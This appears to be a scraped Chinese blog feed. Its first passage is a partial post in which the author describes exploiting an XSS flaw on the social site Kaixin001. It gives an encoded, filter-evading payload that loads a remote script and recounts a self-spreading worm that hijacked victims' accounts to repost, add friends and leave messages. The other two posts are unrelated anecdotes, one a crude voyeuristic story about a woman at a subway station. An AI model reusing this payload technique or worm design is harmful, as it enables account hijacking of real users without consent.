showOtherUrlView(‘,然后提交了,成功了,而且没有被过滤,点了一下,果然弹出了个test的提示框,呵呵,有戏。
因为这时候打开链接的代码变成了这样
onclick=“javascript:showOtherUrlView(‘http://www.kaixin001.com‘,”);alert(‘test’);showOtherUrlView(”,”);“这样的话,就欺骗了它,执行了我们自己的js了
接下来是看怎么利用,盗cookie?挂马?不,那不是我这样良好市民干的事。忽然我有点子了,还是弄点有意思的玩玩吧,还是为了小乖猫,看看csrf方面有什么好玩的
不过接下来发现它对空格有过滤,而且还会转大小写,还会过滤些危险的js,所以就又麻烦了
不过困难怎么会阻挠25虚岁的花季熟男的脚步呢
(unescape(‘%76ar%20s%3ddocumen%74.crea%74e%45lemen%74%28%27s%63%72%69pt%27%29%3bs.%73rc%3d%27http%3a//url/iii.%6A%73%27%3Bdocumen%74.bo%64y.appen%64Chil%64%28s%29′)
换种执行方式,把要执行的代码编码后再执行,果然,成功了
加密部分是var s=document.createElement(‘script’);s.src=’http://url/iii.js';document.body.appendChild(s)的变形
接下来是干什么呢,起码让他起到传播效果吧,所以,首先得让人点击后能把这个内容复制一份,自动发到他自己的转贴中去,这样,传播的效果才会猛
所以抓了个包,看了下发转贴的数据,然后在js里用ajax发了个同样的post,(起先打算直接在js里直接构造form提交的,但那样用户体验不好,我要求的用户体验是用户一点体验都没有,而且不能同时发多个post),但是,奇怪,总是不成功,返回数据告诉我没有权限,真他阿姨的奇怪了,抓包比对了一下,发现格式基本一样,就是cookie里的一个字段不一样,开始怀疑是这个问题,为了验证下,我在本地写了个form提交了下,竟然成功了,看来跟cookie无关,晕,我茫然了,开始折腾………………………………两个小时过去了,终于问题发现了,是我ajax里的测试数据内容太短了,晕,发表个内容而已,又不是睡觉觉,干嘛非要长啊
终于,搞定了,测试了下,点击后可以自动发一条了
接下来就是该干点别的了
让他们加我为好友吧,抓了下数据,很简单的POST,OK了
让他们给小乖猫留言说羡慕她吧,
抓了下数据,很简单的POST,OK了(在这我犯了个奇丑无比的错误,非好友是不能留言的)
让他们加我为好友吧,让我也知道有多少人中蠕虫了,
抓了下数据,很简单的POST,OK了
让他们在他的记录里写下祝我们快乐吧,抓了下数据,不简单的POST,不OK了,里面竟然有个验证码类的字段,验证码生成的,是记录那个页面的服务端返回的,而且都是写死在代码里的,忽然想起转贴的页面也有个验证码,是在js里用变量定义的,用起来很方便,但两个的值不一样,怎么办?不过试了下,竟然好用

最后整理了下要转贴的内容,标题是:开心网员工的秘密博客,内容是:好不容易才发现的,里面有很多劲爆的内容,然后填上欺骗的链接,我就不信没人点
然后测试了下,没问题,就睡觉了
早上起来打开电脑,晕,没有一个加我好友的,但一看,我的好友们都还没上线,还没人帮我传播呢
去上班了,吃完早饭,打开电脑一看,5000多要加我为好友的,,比我想象的还要猛,我正在憧憬着一天下来的话,开心网上所有的页面都会是我的转贴,每个人都会发条记录祝福我
不过,日,开心网很快就发现了,找到了我的JS,利用SQL语句批量,删了所有已经发生的,也修改了BUG,我损失比较大的是,他们删了我所有的系统信息,以及我的大部分好友,晕,删我新加的好友我可以理解,但把我一部分本来就是我的好友删了我很不能理解,但却不是全删,不知道用的是什么规则

OK,就是这样的,还好没被不法分子利用。


]]>
http://lvwei.me/%e5%bc%80%e5%bf%83%e7%bd%91xss%e6%bc%8f%e6%b4%9e-41.html/feed 3
我晕,喝酒把脸喝肿了 http://lvwei.me/%e6%88%91%e6%99%95%ef%bc%8c%e5%96%9d%e9%85%92%e6%8a%8a%e8%84%b8%e5%96%9d%e8%82%bf%e4%ba%86-42.html http://lvwei.me/%e6%88%91%e6%99%95%ef%bc%8c%e5%96%9d%e9%85%92%e6%8a%8a%e8%84%b8%e5%96%9d%e8%82%bf%e4%ba%86-42.html#comments Sat, 21 Feb 2009 17:30:23 +0000 http://lvwei.me/%e6%88%91%e6%99%95%ef%bc%8c%e5%96%9d%e9%85%92%e6%8a%8a%e8%84%b8%e5%96%9d%e8%82%bf%e4%ba%86/ 昨天是公司的年会,是我来公司后参加的第一个年会,因为我们公司是有国家政策扶持和补贴的,所以开始时要求全场起立唱国歌,主持人的开场白套用了郭德纲相声上的选段,把全场男女带入了高潮,今年的年会比往年省了很多,没有表演,没有抽奖,也不管饭,就是领导讲话和互动问答,最后还有个表彰大会

从友谊宾馆出来后就是各回各家各找各妈,我们部门得奖金的优秀员工请吃饭,其实我也想请,可惜我获提名的那个奖我没被选上,我们随便找了一家吃,喝了点酒,因为秦捷同志从小对别人喝酒有阴影,所以我没喝白的,也就喝了两瓶多的啤酒,中间还去抠了吐了,然后有事就先走了,没去参加唱歌活动了,走的时候我神志清醒,充满活力

然后去接了可爱的秦捷同志,然后就是回家,城铁的动力依然是那么强劲,车一颠一颠,我靠着栏杆也跟着一颤一颤,车厢有点热,快到要下车时,我突然感觉四肢乏力,全身发虚,两眼发黑,有点晕车的感觉,还好要到了,我赶紧低腰扶着栏杆,终于车缓慢的停了

忽然感觉脸有点疼,我一看,我正躺在站台的地上,赶紧爬了起来坐在地上,站台上已经空空的了,秦捷同志蹲在我的旁边,还有几个人站在旁边问我要不要送医院 什么的,我突然就明白了我可能是晕倒了,难怪我的小白脸这么疼,我赶紧跟人家说没事没事,就是喝了点酒,不舒服,他们就走了,真的谢谢他们

然后我就此情况同秦捷同志进行了交流
我:“我是在车上晕倒的?你扶我下来的?”
可爱的秦捷同志:“没有,你跟着我后面下车的,我听着声音,回头一看,你已经在地上了”(也是,车上晕的话脸应该没这么疼)
我:“我记得我在车上时,我是低腰扶着把手的啊,你没管我自己就下车了?”
可爱的秦捷同志:“我以为你开玩笑的,我下车时你还在那不动,我招呼你下,你就跟着下了”(真是可爱的秦捷同志,对于喝酒的人就该这样)
我:“难道我是自己下的车?”(我真的不记得我下车了,我脑海里都不曾记得有车门开的镜头)
可爱的秦捷同志:“嗯,然后你就倒了,我吓坏了,当时都不想管你了”(唉,秦捷同志简直是太可爱了)

天哪,太可怕了,原来有些东西竟然是我自己不能掌控的,那种感觉像是睡了一觉,又突然醒了,还好我采用的是空对地直接用脸对地面进行垂直打击的战术,这样疼痛能让我醒的更快点,要不就真的得送医院了

再一想我就想乐,太他妈奇妙了,我竟然自己松了扶手,看着车门,下了车,但我自己却一点印象也没有,太他妈好笑了,难道我的身体不应该是由我自己控制的 吗,这片神奇的土地难道真的没有人权了吗,莫非这就是传说中的偶像剧里的失忆?这种感觉真的很奇妙,我终于又丰富了我的多彩的人生

那几十秒的事情有写入我脑中吗,还是存储了我现在读不出来而已,还是根本就没写入我脑中的数据库,我今天再坐城铁时,下车前还特意还慢走了会,看看熟悉的 场景能不能勾起我昨晚的记忆,电视剧上不都是这么演的么?可惜,很快就被别人挤下车了,难道我的记忆长河里永远要缺失这几十秒?

科学分析表明:可能是喝酒引起的低血糖,又加上点晕车的原因
回家一照镜子,灯光下我的那张小白脸,右脸明显发福,透着一种不对称美
喝酒害人啊,不但伤肝,还能毁容,而且还伤感情,还伤心,可爱的秦捷同志又对我进行了严肃的批评,但是,我真的没怎么喝

我晕,这回是真的晕了

]]>
http://lvwei.me/%e6%88%91%e6%99%95%ef%bc%8c%e5%96%9d%e9%85%92%e6%8a%8a%e8%84%b8%e5%96%9d%e8%82%bf%e4%ba%86-42.html/feed 5
西二旗城铁少妇传奇 http://lvwei.me/%e8%a5%bf%e4%ba%8c%e6%97%97%e5%9f%8e%e9%93%81%e5%b0%91%e5%a6%87%e4%bc%a0%e5%a5%87-43.html http://lvwei.me/%e8%a5%bf%e4%ba%8c%e6%97%97%e5%9f%8e%e9%93%81%e5%b0%91%e5%a6%87%e4%bc%a0%e5%a5%87-43.html#comments Wed, 15 Oct 2008 16:12:32 +0000 http://lvwei.me/%e8%a5%bf%e4%ba%8c%e6%97%97%e5%9f%8e%e9%93%81%e5%b0%91%e5%a6%87%e4%bc%a0%e5%a5%87/ 今天晚上在公司干活忙到11点,然后匆匆去赶那最后一趟城铁,刷卡,小跑上楼,刚要下楼,忽见楼下平地一女背包蹲地,二十五六七八岁左右,侧对着我,作沉思状,怎么了,失恋了?听到脚步,她也蓦然回首,呈木然状,并夹杂几分羞涩,那份羞涩是幼儿园时期的那个可爱逼人的我常能碰见的,难道我下楼的姿势的确很帅?难道传言都是真的?

忽然,听到异样的声响,嗯?什么声音?好像是大规模液体从橡胶小孔中急速流出的声音,难道有人要用水枪呲我?下楼姿势帅也有错?不对,声音好像是那位姑娘发出的,看来不是呲我的,呲我的话起码也要站起来呲啊,不过细一看,好像她没拿水枪,啊?好恐怖,莫非她用的就是近期重现江湖的号称“看似无形,实则无形,杀人更无形”的1986年全球限量销售一把的超级小水枪?难道传言都是真的?

从声音分析,此水枪杀伤力非同小可,足以击地为坑,身正不怕凶器,我挺了挺胸器,继续往下走,忽想,不对,怎么感觉这姿势,这声音,怎么跟年轻时研究过的日本文艺片里的某些场景完全一样,这时候,成熟男人的理性思维开始转动,结合多年的经验以及对如厕时隔壁声音的回忆,分析结果告诉我,这位姑娘可能在尿尿,顿时,炯炯有神的我的小眼开始聚焦,锁定目标,扫描景象,加入马赛克,输入脑中,分析处理,后台返回值告诉我,她不是可能在尿尿,她就是在实实在在的尿尿,那一刻,我脑袋一片空白,儿时的梦想实现的太突然,幸福的有点措手不及

先远观然亵玩焉?NO,那是上个月的我,在全球金融动荡的今天,我成熟了,绯红爬上了脸上的肥肉,双脚颤抖的我转身了,从另一边下楼了,边下边惆怅,为什么我不敢下去呢?我有什么可怕的呢?下楼姿势帅真有错?再回去?不行,成熟男人不会这么干的,可是,的确可惜,我或许可以借此来敲诈她而一夜暴富,或是威胁她当我同事女朋友来混顿饭吃,总之,的确可惜,所以,在人生的道路上,没有勇气往往会错过许多

不过细一想,还好我没下去,我这个月刚成熟,还不能完全把控自己,万一经不住水枪的威力,到时候地铁里的摄像头会记录下我奋不顾身的场景,哇,好险

当我到铁轨边时,姑娘早已等候在另一边,站台上就我俩,她看了我一眼,就转过身去,我赶紧躲在广告牌后,羞死人了,上车时,在互相的侧头相望中,我们依依惜别,姑娘,后会有期,我可能不是唯一见你如厕的男人,但你是第二个被我看见如厕的女人

唉,地铁啊地铁,别以为你在市区混就把自己不当火车了,你带来了高速,成了都市人们急速匆匆的写照,那位姑娘可能是怕错过最后一趟的你吧,你就不能再晚一个小时嘛,或者,你让你的主人们两边都弄一个厕所也成啊

]]>
http://lvwei.me/%e8%a5%bf%e4%ba%8c%e6%97%97%e5%9f%8e%e9%93%81%e5%b0%91%e5%a6%87%e4%bc%a0%e5%a5%87-43.html/feed 9